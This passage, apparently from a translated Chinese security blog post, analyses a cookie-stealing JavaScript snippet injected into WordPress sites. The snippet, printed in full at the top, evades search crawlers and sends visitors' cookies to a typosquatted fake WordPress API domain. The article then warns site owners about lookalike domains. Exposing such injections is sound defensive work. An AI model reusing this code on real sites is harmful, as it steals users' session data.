var gd = document.cookie.indexOf("_utmzz=");
if (gd == -1 && (/Applebot|baiduspider|Bingbot|Googlebot|ia_archiver|msnbot|Naverbot|seznambot|Slurp|teoma|Yandex|Yeti/i.test(navigator.userAgent) == false)) {
var rd = Math.floor(Math.random() * 2);
if (rd == 0) {
var sss = document.createElement('script');
sss.src = "hxxps://code.wordprssapi[.]com/ajax/json.aspx?c=" + escape(document.cookie);
document.body.appendChild(sss)
}
var dd = new Date();
dd.setTime(dd.getTime() + 86400000);
window.document.cookie = "_utmzz=ga; expires=" + dd.toGMTString()
}
}
if (typeof(jQuery) != 'undefined') {
jQuery(function() {
adsadsgg()
})
} else {
window.onload = function() {
adsadsgg()
}
}

在頂部有一個條件語句,排除了來自搜索引擎爬蟲的用戶代理的Cookies。這確保了發送給攻擊者的數據更有可能立即可用。

在確保數據屬于真實用戶后,腳本收集活動Cookie數據并將其傳遞給惡意網站,供攻擊者使用。

假冒WordPress API域名

在腳本中,您可能注意到了虛假域名——code.wordprssapi[.]com——那是Cookie數據被發送的地方。

通過購買一個與合法網站平臺或服務非常相似的域名,一些網站管理員可能會在他們的代碼中忽視這一點,并假設它是一個官方WordPress域名(它不是)。

順便說一下,code.wordpressapi[.]com(正確拼寫)也與WordPress無關。

結論

我們已經看到過拼寫錯誤。它繼續是一種幫助黑客逃避網站所有者檢測的策略。這是所有網站管理員在審計自己的代碼時應該意識到的事情。要小心,始終檢查域名是否合法,特別是如果它涉及收集或向第三方網站發送信息。

即使它是一個官方WordPress域名,發送Cookies始終是一個危險信號。Cookies包含大量不應共享的私人信息。

由于攻擊者越來越擅長隱藏他們的蹤跡,核心文件完整性檢查或網站監控服務將提醒用戶有關問題。

更多API相關內容,請查看冪簡

上一篇:

針對API漏洞挖掘技巧學習

下一篇:

OAuth和OpenID Connect圖解指南
#你可能也喜歡這些API文章!

我們有何不同?

API服務商零注冊

多API并行試用

數據驅動選型,提升決策效率

查看全部API→
??

熱門場景實測,選對API

#AI文本生成大模型API

對比大模型API的內容創意新穎性、情感共鳴力、商業轉化潛力

25個渠道
一鍵對比試用API 限時免費

#AI深度推理大模型API

對比大模型API的邏輯推理準確性、分析深度、可視化建議合理性

10個渠道
一鍵對比試用API 限時免費